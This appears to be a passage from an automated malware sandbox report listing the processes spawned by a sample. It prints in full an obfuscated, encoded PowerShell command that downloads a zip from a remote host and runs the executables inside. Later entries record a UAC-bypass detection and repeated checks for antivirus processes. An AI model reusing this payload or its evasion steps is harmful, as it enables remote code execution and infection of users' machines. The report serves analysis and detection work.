                                                                                                                                                                                                                                            Commandline:powershell -exec bypass -ENc LgAoACgARwBFAFQALQB2AGEAUgBJAEEAQgBMAGUAIAAnACoATQBkAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAG4AJwAnACkAIAAoACgAKAAnAFMARQB0AC0AdgBhAFIASQBhAEIAbABlACAAKAA2AFMAdgA4AG0AYQA2AFMAdgArADYAUwB2AEYAWgA2AFMAdgApACAAIAAoACAAWwBUAFkAcAAnACsAJwBFAF0AKAA2AFMAdgB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADEAfQA2AFMAdgAtAEYAbABUAFYAZQBsAFQAVgAsAGwAVAAnACsAJwBWAEkATgBsAFQAVgAsAGwAVABWAFMAeQAnACsAJwBTAFQAbABUAFYALABsAFQAVgBtAC4AaQBvAGwAVABWACwAbABUAFYALgBTAGUARQBLAG8AUgBJAEcAbABUAFYAKQApADsAIABzAEUAdAAtAEkAVABlAE0AIAAgAFYAYQByAGkAYQBiAGwAZQA6ADgAQQBQAGMAIAAgACgAIABbAFQAeQBwAGUAXQAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ACcAKwAnADYAUwB2ACAALQBGACAAbABUAFYARABsAFQAVgAsAGwAVABWAFMAWQBzAGwAVABWACwAbABUAFYAdABFAE0ALgBnAFUAJwArACcASQBsAFQAJwArACcAVgApACAAIAApACAAOwAgAHMAVgAgAGMAZwAwACcAKwAnAHEAIAAoACAAWwB0AFkAUABlAF0AKAA2AFMAdgB7ADMAfQB7ADAAfQB7ADEAfQB7ADQAfQB7ADIAfQA2AFMAdgAgAC0ARgBsAFQAVgB0AGUATQAuAGkATwAnACsAJwBsAFQAVgAsAGwAVABWAC4AUABsAFQAVgAsAGwAVABWAGgAbABUAFYALABsAFQAVgBTAFkAUwBsAFQAVgAsAGwAVABWAEEAVAAnACsAJwBsAFQAVgApACkAJwArACcAIAA7ACAAUwBlAHQALQBWAGEAcgBpACcAKwAnAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB1AEIAMgBnAHQAIAAtAFYAYQBsAHUAZQAgACgAWwBUAFkAUABlAF0AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEUAbQAuAEkAJwArACcATwAuAEYAbABUAFYALABsAFQAVgBTAHkAbABUAFYALABsAFQAVgBTAFQAbABUAFYALABsAFQAVgBJAEwARQBsAFQAVgApACkAIAAgADsAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAHMAYwBSAEkAUABUAEIATABPAEMAawAgAC0AVgBhAGwAdQBlACAAKAB7AAoAIAAnACsAJwAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFoASQBQAFUAUgBsACAALQBWAGEAbAB1AGUAIAAoADYAUwB2AHsAMwB9AHsANwB9AHsANgB9AHsANAB9AHsAOQB9AHsAMQB9AHsAMQAwAH0AewA4AH0AewAwAH0AewA1AH0AewAyAH0ANgBTAHYAIAAtAGYAbABUAFYAdABsACcAKwAnAFQAVgAsAGwAVABWAHAALwB
sACcAKwAnAFQAVgAsAGwAVABWAHQAeAB0AGwAVABWACwAbABUAFYAaAB0AGwAVABWACwAbABUAFYAaQBwAHQAZQBkAGUAbABUAFYALABsAFQAVgBfAGMAbABwAF8AcABhAG4ALgBsAFQAVgAsAGwAVABWAHMAOgAvAC8AawBsAGwAVABWACwAbABUAFYAdABwAGwAVABWACwAbABUAFYAbgBsAFQAVgAsAGwAVABWAGgAbwBhAC4AcwBoACcAKwAnAG8AbABUAFYALABsAFQAVgBpAGwAVABWACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAdwBFAEIAYwBsAEkARQBOAHQAIAAtAFYAYQBsAHUAZQAgACgALgAoADYAUwB2AHsAMQB9AHsAMgB9AHsAMAB9ADYAUwB2ACAALQBmAGwAVABWAGoAZQBjAHQAbABUAFYALABsAFQAVgBOAGUAdwBsAFQAVgAsAGwAVABWAC0ATwBiAGwAVABWACkAIAAoADYAUwB2AHsAMQB9AHsAMAB9AHsAMgB9AHsAMwB9ADYAUwB2AC0AZgAgAGwAVABWAGUAdAAuAFcAbABUAFYALABsAFQAVgBTAHkAcwAnACsAJwB0AGUAbQAuAE4AbABUAFYALABsAFQAVgBlAGwAVABWACwAbABUAFYAJwArACcAYgBDAGwAaQBlAG4AdABsAFQAVgApACkACgAnACsAJwAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAJwArACcAbABlACAALQBOAGEAbQBlACAAWgBpAFAAZABhAHQAQQAgAC0AVgBhAGwAdQBlACcAKwAnACAAKABEAHkARQB7AHcAZQBCAFUAbQBCAEMATABCAFUAbQBJAEUAbgBUAH0ALgAoADYAUwB2AHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9ADYAUwB2ACAALQBmAGwAVABWAGEAdABsAFQAVgAsAGwAVABWAGEAZABEAGwAVABWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAEQAbwB3AG4AbABvAGwAVABWACkALgBJAG4AdgBvAGsAZQAoACcAKwAnAEQAeQBFAHsAegBCAFUAbQBJAFAAQgBVAG0AVQByAGwAfQApACcAKwAnACkACgAKACAAIAAnACsAJwAgACAAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIABNAEUATQBvAFIAeQAnACsAJwBTAFQAcgBFAEEAbQAgAC0AVgBhAGwAdQBlACAAKAAmACgANgBTAHYAewAyAH0AewAxAH0AewAwAH0ANgBTAHYALQBmACAAbABUAFYAZQBjACcAKwAnAHQAbABUAFYALABsAFQAVgBPAGIAagBsAFQAVgAsAGwAVABWAE4AZQB3AC0AbABUAFYAKQAgACgANgBTAHYAewAyAH0AewAzAH0AewAxAH0AJwArACcAewAwAH0ANgBTAHYALQBmACAAbABUAFYAJwArACcAYQBtAGwAVABWACwAbABUAFYAUwB0AHIAZQBsAFQAVgAsAGwAVABWAFMAeQBzAGwAVABWACwAbABUAFYAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBsAFQAVgApACkACgAgACAAIAAgAEQAeQBFAHsATQBlAG0AQgBVAG0AbwByAHkAUwBUAHIAQgBVAG0AZQBhAG0AfQAuACgANgBTAHYAewAwAH0AewAxAH0ANgBTAHYAIAAtAGYAbABUAFYAVwBsAFQAVgAsAGwAJwArACcAVABWAHIAaQB0AGUAbABUAFYAKQAuAEkAbgB2AG8AJwArACcAawBlACgARAB5AEUAewBaAEkAQgBVAG0AcABEAGEAVABBAH0ALAAgADAALAAgAEQAeQBFAHsAWgBpAFAAQgBVAG0ARABCAFUAbQBBAHQAYQB9AC4ANgB
TAHYAbABlAG4ARwBCAFUAbQBUAEgANgBTAHYAKQAKACAAIAAgACAARAB5AEUAewBtAEUAbQBPAFIAQgBVAG0AWQBCAFUAbQBTAHQAQgBVAG0AUgBFAEIAVQBtAEEATQB9AC4ANgBTAHYAcwBCACcAKwAnAFUAbQBFAGUAJwArACcAawA2AFMAdgAoADAALAAgACAAKABWAEEAUgBJAEEAQgBMAEUAIAAoADYAUwB2ADgAbQBBADYAUwB2ACsANgBTAHYARgBaADYAUwB2ACkAIAApAC4AdgBhAGwAVQBlADoAOgA2AFMAdgBiAEIAVQBtAGUARwBJAE4ANgBTAHYAKQAKAAoAIAAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAFUATgBpAHEAdQBFAEYATwBMAGQARQBSAG4AQQBNAGUAIAAtAFYAYQBsAHUAZQAgACgARAB5AEUAOABhAHAAQwA6ADoAKAA2AFMAdgB7ADEAfQB7ADAAfQB7ADIAfQA2AFMAdgAnACsAJwAgAC0AZgBsAFQAVgB1AGwAVABWACwAbABUAFYATgBlAHcARwBsAFQAVgAsAGwAVABWAGkAZABsAFQAVgApAC4ASQBuAHYAbwBrAGUAKAApAC4AKAA2AFMAdgB7ADAAfQB7ADEAfQB7ADIAfQA2AFMAdgAtAGYAbABUAFYAVABsAFQAJwArACcAVgAsAGwAVABWAG8AbABUAFYALABsAFQAVgBTAHQAcgBpAG4AZwBsAFQAVgApAC4ASQBuAHYAbwBrAGUAKAApACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAQQBwAFAARABBAFQAYQBQAGEAVABIACAALQBWAGEAbAB1AGUAIAAoAEQAeQBFAGMARwAwAFEAOgA6ACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYAIAAtAGYAbABUACcAKwAnAFYAZQBsAFQAVgAsAGwAVABWAEMAbwBtAGIAaQBuACcAKwAnAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsAZQBCAFUAbQBOAEIAVQBtAFYAOgBsAG8AYwBBAEwAQgBVAG0AQQBQAFAARABBAHQAQQB9ACwAIABEAHkARQB7AFUAJwArACcAbgBJAHEAdQBFAEIAVQBtAEYATwBCAFUAbQAnACsAJwBMAEQAZQBSAG4AQgBVAG0AQQBNAEUAfQAnACsAJwApACkACgAgACAAIAAgAC4AKAA2AFMAdgB7ADEAfQB7ADAAfQA2AFMAdgAgAC0AZgBsAFQAVgBJAHQAJwArACcAZQBtAGwAVABWACwAJwArACcAbABUAFYATgBlAHcALQBsAFQAVgApACAALQBJAHQAZQBtAFQAeQBwAGUAIAAoADYAUwB2AHsAMAB9AHsAMgAnACsAJwB9AHsAMQB9ADYAUwB2ACcAKwAnAC0AZgBsAFQAVgBEAGkAcgBsAFQAVgAsAGwAVABWAHkAJwArACcAbABUAFYALABsAFQAVgBlAGMAdABvAHIAbABUAFYAKQAgAC0AUABhAHQAaAAgAEQAeQBFAHsAYQBwAEIAVQBtAFAAQgBVAG0AZABhAFQAYQBCAFUAbQBQAGEAVABoAH0AIAAtAEYAbwByAGMAZQAgAHoAbgBxACAALgAoADYAUwB2AHsAMQB9AHsAMAB9ADYAUwB2ACAALQBmACAAbABUAFYAdQB0AC0ATgB1AGwAbABsAFQAVgAsAGwAVABWAE8AbABUAFYAKQAKAAoAIAAgACAAIABTAGUAdAAtAFYAJwArACcAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AJwArACcAZQAgAHQAZQBNAFAAWgBJAHAAUABBAHQAJwArACcAaAAgAC0AVgBhAGwAdQBlACAAKAAoACAAZwBjAGkAIAAgAHYAYQB
SAGkAQQBiAGwARQA6AEMAZwAwAFEAIAAgACkALgBWAGEAbAB1AGUAOgA6ACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYALQBmACAAbABUAFYAbwBtAGIAaQBuAGUAbABUAFYALABsAFQAVgBDAGwAVABWACkAJwArACcALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsARQBuAHYAQgBVAG0AOgB0AEUAQgBVAG0AbQAnACsAJwBwAH0ALAAgADYAUwB2AEQAeQBFAHUAbgBpACcAKwAnAHEAdQBlAEYAbwBsAGQAZQByAE4AYQBtACcAKwAnAGUALgB6AGkAcAA2AFMAdgApACkACgAgACAAIAAgACAAIAAoACAAIABnAEMAaQAgACgANgBTAHYAdgBBADYAUwB2ACsANgBTAHYAcgA2AFMAdgArADYAUwB2AGkAQQBiAGwAZQA6AFUAYgAyAEcAVAA2AFMAdgApACkALgBWAEEAbAB1AGUAOgA6ACgANgBTAHYAewAxAH0AewAzAH0AewAyAH0AewAwAH0ANgBTAHYAIAAtAGYAbABUAFYAbABCAHkAdABlAHMAbABUAFYALABsAFQAVgBXAHIAaQAnACsAJwB0AGwAVABWACwAbABUAFYAbABsAFQAVgAsACcAKwAnAGwAVABWAGUAQQBsAFQAVgApAC4ASQBuAHYAbwBrAGUAKABEAHkARQB7AHQAZQBtAHAAWgBJAHAAQgBVAG0AcABBAEIAVQBtAFQAaAB9ACwAIABEAHkARQB7AG0AZQBNAG8AQgBVAG0AUgBZAEIAVQBtAFMAdABSAEIAVQBtAEUAYQBNAH0ALgAoADYAUwB2AHsAMQB9AHsAMAB9ADYAUwB2AC0AZgBsAFQAVgByAGEAeQBsAFQAVgAsAGwAVABWAFQAbwBBAHIAbABUAFYAKQAuAEkAbgB2AG8AawBlACgAKQApAAoACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAUwBoAGUATABMACAALQBWAGEAbAB1AGUAIAAoAC4AKAA2AFMAdgB7ADEAfQB7ADIAfQB7ADAAfQA2AFMAdgAgAC0AZgBsAFQAVgBqAGUAYwB0AGwAVABWACwAbABUAFYATgBlAHcALQBsAFQAVgAsAGwAVABWAE8AYgBsAFQAVgApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgANgBTAHYAewAyAH0AewAwAH0AewAzAH0AewA0AH0AewAxACcAKwAnAH0ANgBTAHYALQBmAGwAVABWAHAAbABpAGMAbABUAFYALABsAFQAVgBuAGwAVABWACwAbABUAFYAUwBoAGUAbABsAC4AQQBwAGwAVAAnACsAJwBWACwAbABUAFYAYQBsAFQAVgAsAGwAVABWAHQAaQBvAGwAVABWACkAKQAKACAAIAAnACsAJwAgACAAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAB6AGkAcABGAG8AbABkAEUAUgAgAC0AVgBhAGwAdQBlACAAKABEAHkARQB7AHMAaABCAFUAbQBlAGwAbAB9AC4AKAA2AFMAdgB7ADAAfQB7ADEAfQB7ADIAfQA2AFMAJwArACcAdgAnACsAJwAgAC0AZgBsAFQAVgBOAGEAbQBsAFQAVgAsAGwAVABWAGUAUwBwAGEAbABUAFYALABsAFQAVgBjAGUAbABUAFYAKQAuAEkAbgB2AG8AawBlACgARAB5AEUAewB0AEUAbQBwAHoAQgBVAG0ASQBQAHAAQQBCAFUAbQBUAGgAfQApACkACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAARABlAHMAdAAnACsAJwBJAE4AYQBUAEkATwBuAGYATwBMAGQAZQByACAALQBWAGEAbAB1AGUAIAAoAEQAeQB
FAHsAcwBCAFUAbQBoAGUAbABsAH0ALgAoADYAUwB2AHsAMAB9AHsAMQB9AHsAMgB9ADYAUwB2ACAALQBmACAAbABUAFYATgBhAG0AZQBTAHAAYQBsAFQAVgAsAGwAVABWAGMAbABUAFYALABsAFQAVgBlAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsAYQBQAEIAVQBtAFAARABCAFUAbQBBAHQAQgBVAG0AQQBQAGEAVABIAH0AKQApAAoAIAAgACAAIABEAHkARQB7AEQAZQAnACsAJwBCAFUAbQBTAFQAaQBCAFUAbQBOAGEAVABpAG8AQgBVAG0ATgBGAE8ATABkAEUAcgB9AC4AKAA2AFMAdgB7ADAAfQB7ADEAfQA2AFMAdgAgAC0AZgAgAGwAVABWAEMAbwBwAHkASABsAFQAVgAsAGwAVABWAGUAcgBlAGwAVABWACkALgBJAG4AdgBvAGsAZQAoAEQAeQBFAHsAWgBpAFAAQgBVAG0ARgBPAEwAQgBVAG0ARABCAFUAbQBlAHIAfQAuACgANgBTAHYAewAxAH0AewAwAH0ANgBTAHYALQBmACAAbABUAFYAdABlAG0AcwBsAFQAVgAsAGwAVABWAEkAbABUAFYAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAMgAwACkAIAAgAAoACgAgACAAIAAgAFMAZQB0AC0AVgBhAHIAaQBhAGIAbAAnACsAJwBlACAALQBOAGEAbQBlACAARQB4AEUARgBpAGwAZQBzACAALQAnACsAJwBWAGEAbAB1AGUAIAAoACYAKAA2AFMAJwArACcAdgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQB7ADQAfQA2AFMAdgAtAGYAbABUAFYASQBsAFQAVgAsAGwAVABWAEcAbABUAFYALABsAFQAVgBlAHQALQBsAFQAVgAsAGwAVABWAEMAaABpAGwAZABsAFQAVgAsAGwAVABWACcAKwAnAHQAZQBtAGwAVABWACkAIAAtACcAKwAnAEYAaQBsAHQAZQByACAAKgAuAEIAVQBtAGUAWABFACAALQBSAGUAYwB1AHIAcwBlACAALQBQAGEAdABoACAARAB5AEUAewBhAFAAQgBVAG0AcABCAFUAbQBkAGEAQgBVAG0AVABBAFAAQQBUAGgAfQApAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACcAKwAnACAAKABEAHkARQB7AEUAQgBVAG0AeABFAEYASQBCAFUAbQBsAGUAfQAgAGkAbgAgAEQAeQBFAHsAZQBCAFUAbQAnACsAJwBYAGUARgBpAGwAQgBVAG0AZQBTAH0AKQAgAHsACgAgACAAIAAgACAAIAAgACAALgAoADYAUwB2AHsAMAB9AHsAMQB9AHsAMgB9ADYAUwB2AC0AZgAgAGwAVABWAFMAdABsAFQAVgAsAGwAVAAnACsAJwBWAGEAcgB0AC0AUAByAG8AYwBsAFQAVgAsAGwAVABWAGUAcwBzAGwAVABWACkAIAAtAEYAaQBsAGUAUABhAHQAaAAgAEQAeQBFAHsARQBYAEIAVQBtAEUARgBJAEIAVQBtAEwAZQB9AC4ANgBTAHYARgB1AEIAVQBtAGwAbABuAEIAVQBtAEEAbQBFADYAUwB2ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAIAAtAFcAYQBpAHQACgAgACAAIAAgAH0ACgAKAH0AKQAKAAoAJgAgAEQAeQBFAHsAcwBDAFIAaQBwAHQAQgBVAG0AQgBMAEIAVQBtAE8AYwBrAH0AIAA+ACAARAB5AEUAewBuAHUAQgBVAG0ATABsAH0AIAAyAD4AJgAxAAoAJwApACAALQByAEUAcABMAEEAYwBlACAAIAAoAFsAQwBoAEEAcgBdADYANgArAFsAQwBoAEEAcgBdADgANQArAFsAQwBoAEEAcgBdADEAMAA5ACkALABbAEMAaAB
BAHIAXQA5ADYALQByAEUAcABMAEEAYwBlACAAJwA2AFMAdgAnACwAWwBDAGgAQQByAF0AMwA0ACAAIAAtAGMAUgBFAHAATABBAEMAZQAnAEQAeQBFACcALABbAEMAaABBAHIAXQAzADYAIAAtAGMAUgBFAHAATABBAEMAZQAgACcAegBuAHEAJwAsAFsAQwBoAEEAcgBdADEAMgA0ACAAIAAtAGMAUgBFAHAATABBAEMAZQAnAGwAVABWACcALABbAEMAaABBAHIAXQAzADkAKQAgACkA
Imagebase:0xd30000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:04:35:50
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:37
Start time:04:36:23
Start date:23/12/2024
Path:C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe"
Imagebase:0x590000
File size:18'610'385 bytes
MD5 hash:0EFDBBF3F5074D596D3E61446B623942
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Antivirus matches:
• Detection: 18%, ReversingLabs
Has exited:true

Target ID:39
Start time:04:36:25
Start date:23/12/2024
Path:C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exe"
Imagebase:0x400000
File size:5'729'136 bytes
MD5 hash:537915708FE4E81E18E99D5104B353ED
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000027.00000002.2156116548.000000000974A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:true

Target ID:40
Start time:04:36:25
Start date:23/12/2024
Path:C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$50362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe"
Imagebase:0xcf0000
File size:3'366'912 bytes
MD5 hash:D8F3F93349755C2BD326DF91966FD6F5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Has exited:true

Target ID:41
Start time:04:36:28
Start date:23/12/2024
Path:C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
Imagebase:0x590000
File size:18'610'385 bytes
MD5 hash:0EFDBBF3F5074D596D3E61446B623942
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Has exited:true

Target ID:42
Start time:04:36:29
Start date:23/12/2024
Path:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp" /SL5="$60362,17641136,845824,C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exe" /VERYSILENT
Imagebase:0x9c0000
File size:3'366'912 bytes
MD5 hash:D8F3F93349755C2BD326DF91966FD6F5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Has exited:true

                                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                                            Start time:04:36:35
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                                            Start time:04:36:35
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                                            Start time:04:36:35
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                                                                                                            Imagebase:0x7ff7bda80000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                                                            Start time:04:36:35
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:find /I "wrsa.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff61dd10000
                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                                            Start time:04:36:36
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                                            Start time:04:36:36
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                                            Start time:04:36:36
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                            Imagebase:0x7ff7bda80000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                                            Start time:04:36:36
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:find /I "opssvc.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff61dd10000
                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                                            Start time:04:36:37
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Imagebase:0x7ff6fd780000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:52
Start time:04:36:37
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:53
Start time:04:36:37
Start date:23/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Imagebase:0x7ff7bda80000
File size:106'496 bytes
